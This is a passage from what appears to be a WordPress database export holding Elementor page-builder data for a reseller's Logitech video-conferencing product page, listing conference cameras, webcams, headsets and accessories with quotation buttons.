Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1a08e65\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93261d2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-bcc950.png\",\"id\":1319}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0e23f40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>BCC950<\\/h3><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5fe5fab\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"67ffddd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":20},\"elements\":[{\"id\":\"177327c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ptz-pro-2-camera.png\",\"id\":1321}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ff04afc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PTZ PRO 2<\\/h3><p>HD 1080p video camera with enhanced pan\\/tilt and zoom<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e3ff14a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a021238\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5be05f3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"aea13c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"790f00c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-camera-e1544499263206.png\",\"id\":1247}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"322d778\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>Rally Camera<\\/h4><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5fe363c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"3862603\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"8e81386\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"51d763e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7410c4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>VC ROOM SOLUTIONS<\\/h2><p>Complete room solutions from Logitech allow participants to quickly kick off and run a video conference meeting.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"75fc0cb\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"345e12f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b63babc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be0e6a0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-smartdock-flex.png\",\"id\":1397},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9005f6d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SMARTDOCK<\\/h3><p>Secure meeting room console designed for Skype Room Systems<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b9dedfe\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"9b49863\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"433835b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ff5eeb4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"1b363b98\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"35986ce0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"64637ebe\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"product-details-ctn\\\"><h2 style=\\\"text-align: center;\\\">\\u00a0<\\/h2><p style=\\\"text-align: center;\\\">\\u00a0<\\/p><h2 style=\\\"text-align: center;\\\">WEBCAMS<\\/h2><p class=\\\"lead\\\" style=\\\"text-align: center;\\\">Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.<\\/p><table><tbody><tr><td width=\\\"200\\\"><p><img class=\\\"alignnone wp-image-1332 size-medium\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/briopictograms-300x300.png\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"300\\\" \\/><\\/p><p style=\\\"text-align: center;\\\"><strong>Logitech Brio<\\/strong><\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><td width=\\\"200\\\"><p><img class=\\\"aligncenter wp-image-1334 size-medium\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/c930e-webcam-300x300.png\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"300\\\" \\/><\\/p><p style=\\\"text-align: center;\\\"><strong>Logitech C9230e<\\/strong><\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><td width=\\\"200\\\"><p><img class=\\\"alignnone wp-image-1336 size-medium\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/c925e-webcam-300x300.png\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"300\\\" \\/><\\/p><p style=\\\"text-align: center;\\\"><strong>Logitech C925e<\\/strong><\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><\\/tr><tr><td colspan=\\\"3\\\" width=\\\"601\\\"><p>\\u00a0<img class=\\\"wp-image-1354 size-medium aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/b525-pdp-2017-refresh-300x300.png\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"300\\\" \\/><\\/p><p style=\\\"text-align: center;\\\"><strong>Logitech B525<\\/strong><\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><\\/tr><\\/tbody><\\/table><\\/div><h2>\\u00a0<\\/h2><h2 style=\\\"text-align: center;\\\">HEADSETS<\\/h2><p class=\\\"lead\\\" style=\\\"text-align: center;\\\">Stylish and affordable, Logitech headsets are designed for long-lasting comfort to make every call more productive.<\\/p><p><img class=\\\"wp-image-1364 size-medium aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/h570e-headset-300x300.png\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"300\\\" \\/><\\/p><p style=\\\"text-align: center;\\\"><strong>Logitech H570e Headset<\\/strong><\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><h2 style=\\\"text-align: center;\\\">VIDEO COLLABORATION ACCESSORIES<\\/h2><table><tbody><tr><td width=\\\"200\\\"><p><img class=\\\"alignnone size-full wp-image-1386\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/smartdock-extender-box.png\\\" alt=\\\"\\\" width=\\\"393\\\" height=\\\"393\\\" \\/><\\/p><p style=\\\"text-align: center;\\\"><strong><span class=\\\"product-name\\\">SmartDock Extender Box<\\/span><\\/strong><\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><td width=\\\"200\\\"><p><img class=\\\"alignnone size-full wp-image-1391\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-screen-share.png\\\" alt=\\\"\\\" width=\\\"393\\\" height=\\\"393\\\" \\/><\\/p><p style=\\\"text-align: center;\\\"><strong>Screen Share<\\/strong><\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><td width=\\\"200\\\"><p><img class=\\\"alignnone size-full wp-image-1392\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-expansion-microphones.png\\\" alt=\\\"\\\" width=\\\"393\\\" height=\\\"393\\\" \\/><\\/p><p style=\\\"text-align: center;\\\"><strong>Group Expansion Mics<\\/strong><\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><\\/tr><tr><td width=\\\"200\\\"><p><img class=\\\"alignnone size-full wp-image-1397\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-smartdock-flex.png\\\" alt=\\\"\\\" width=\\\"393\\\" height=\\\"393\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">Logitech SmartDock Flex<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><td width=\\\"200\\\"><p><img class=\\\"alignnone size-full wp-image-1401\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-15m-extended-cable.png\\\" alt=\\\"\\\" width=\\\"393\\\" height=\\\"393\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">Group 15m Extended Cable<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><td width=\\\"200\\\"><p><img class=\\\"alignnone size-full wp-image-1404\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-10m-extended-cable.png\\\" alt=\\\"\\\" width=\\\"393\\\" height=\\\"393\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">Group 10m Extended Cable<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><\\/tr><tr><td colspan=\\\"3\\\" width=\\\"601\\\"><p><img class=\\\"aligncenter wp-image-1406 size-medium\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/meetup-expansion-mics-300x300.png\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"300\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">MeetUp Expansion Mic<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5391,2920,'_elementor_version','0.4'),(5403,2922,'_wp_page_template','template-fullwidth.php'),(5404,2922,'_elementor_edit_mode','builder'),(5405,2922,'_elementor_template_type','post'),(5406,2922,'_elementor_data','[{\"id\":\"71c39ac\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"e477157\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":38.387,\"content_position\":\"center\"},\"elements\":[{\"id\":\"1e2e480\",\"elType\":\"widget\",\"settings\":{\"title\":\"VIDEO CONFERENCING\\u200b\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"f051e18\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":61.61},\"elements\":[{\"id\":\"5e28b2d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-group.png\",\"id\":1242},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aad4243\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ab857b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b3866d6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>CONFERENCE CAMERAS<\\/h2><p>Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0326f20\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"56b446e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"963d60b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-group.png\",\"id\":1242}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"eeaf14e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP<\\/h3><p>Video conferencing for mid to large-sized meeting rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c880fed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"7bbbcce\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-group\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1e67209\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8a768bb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-system-b2b-pdp.png\",\"id\":1249}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"59f66f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>Rally<\\/h4><p>Premium Ultra-HD ConferenceCam system with automatic camera control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5e9935e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"14b03e7\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-rally\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1a473ca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":-18},\"elements\":[{\"id\":\"009aa7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/meetup-conference-cam.png\",\"id\":1316}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6572b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>MeetUp<\\/h4><p>All-in-One ConferenceCam with 120\\u00b0 field of view and integrated audio, perfect for small conference and huddle rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9ea3deb\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2042b97\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2e8e54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1b201c2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-connect.png\",\"id\":1318}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"17f6307\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>CONNECT<\\/h3><p>Portable ConferenceCam with Bluetooth speakerphone for the huddle room, home office, and on the go<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ed3411\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1a08e65\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93261d2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-bcc950.png\",\"id\":1319}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0e23f40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>BCC950<\\/h3><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5fe5fab\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"67ffddd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":20},\"elements\":[{\"id\":\"177327c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ptz-pro-2-camera.png\",\"id\":1321}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ff04afc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PTZ PRO 2<\\/h3><p>HD 1080p video camera with enhanced pan\\/tilt and zoom<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e3ff14a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a021238\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5be05f3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"aea13c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"790f00c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-camera-e1544499263206.png\",\"id\":1247}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"322d778\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>Rally Camera<\\/h4><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5fe363c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"3862603\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"8e81386\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"51d763e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7410c4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>VC ROOM SOLUTIONS<\\/h2><p>Complete room solutions from Logitech allow participants to quickly kick off and run a video conference meeting.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"75fc0cb\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"345e12f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b63babc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be0e6a0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-smartdock-flex.png\",\"id\":1397},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9005f6d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SMARTDOCK<\\/h3><p>Secure meeting room console designed for Skype Room Systems<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b9dedfe\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"9b49863\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"433835b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ff5eeb4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"1b363b98\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"35986ce0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"64637ebe\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"product-details-ctn\\\"><h2 style=\\\"text-align: center;\\\">\\u00a0<\\/h2><p style=\\\"text-align: center;\\\">\\u00a0<\\/p><h2 style=\\\"text-align: center;\\\">WEBCAMS<\\/h2><p class=\\\"lead\\\" style=\\\"text-align: center;\\\">Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.<\\/p><table><tbody><tr><td width=\\\"200\\\"><p><img class=\\\"alignnone wp-image-1332 size-medium\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/briopictograms-300x300.png\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"300\\\" \\/><\\/p><p style=\\\"text-align: center;\\\"><strong>Logitech Brio<\\/strong><\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><td width=\\\"200\\\"><p><img class=\\\"aligncenter wp-image-1334 size-medium\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/c930e-webcam-300x300.png\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"300\\\" \\/><\\/p><p style=\\\"text-align: center;\\\"><strong>Logitech C9230e<\\/strong><\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><td width=\\\"200\\\"><p><img class=\\\"alignnone wp-image-1336 size-medium\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/c925e-webcam-300x300.png\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"300\\\" \\/><\\/p><p style=\\\"text-align: center;\\\"><strong>Logitech C925e<\\/strong><\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><\\/tr><tr><td colspan=\\\"3\\\" width=\\\"601\\\"><p>\\u00a0<img class=\\\"wp-image-1354 size-medium aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/b525-pdp-2017-refresh-300x300.png\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"300\\\" \\/><\\/p><p style=\\\"text-align: center;\\\"><strong>Logitech B525<\\/strong><\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><\\/tr><\\/tbody><\\/table><\\/div><h2>\\u00a0<\\/h2><h2 style=\\\"text-align: center;\\\">HEADSETS<\\/h2><p class=\\\"lead\\\" style=\\\"text-align: center;\\\">Stylish and affordable, Logitech headsets are designed for long-lasting comfort to make every call more productive.<\\/p><p><img class=\\\"wp-image-1364 size-medium aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/h570e-headset-300x300.png\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"300\\\" \\/><\\/p><p style=\\\"text-align: center;\\\"><strong>Logitech H570e Headset<\\/strong><\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><h2 style=\\\"text-align: center;\\\">VIDEO COLLABORATION ACCESSORIES<\\/h2><table><tbody><tr><td width=\\\"200\\\"><p><img class=\\\"alignnone size-full wp-image-1386\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/smartdock-extender-box.png\\\" alt=\\\"\\\" width=\\\"393\\\" height=\\\"393\\\" \\/><\\/p><p style=\\\"text-align: center;\\\"><strong><span class=\\\"product-name\\\">SmartDock Extender Box<\\/span><\\/strong><\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><td width=\\\"200\\\"><p><img class=\\\"alignnone size-full wp-image-1391\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-screen-share.png\\\" alt=\\\"\\\" width=\\\"393\\\" height=\\\"393\\\" \\/><\\/p><p style=\\\"text-align: center;\\\"><strong>Screen Share<\\/strong><\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><td width=\\\"200\\\"><p><img class=\\\"alignnone size-full wp-image-1392\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-expansion-microphones.png\\\" alt=\\\"\\\" width=\\\"393\\\" height=\\\"393\\\" \\/><\\/p><p style=\\\"text-align: center;\\\"><strong>Group Expansion Mics<\\/strong><\\/p><p style=\\\"text-align: center;\\\">[maxbutton 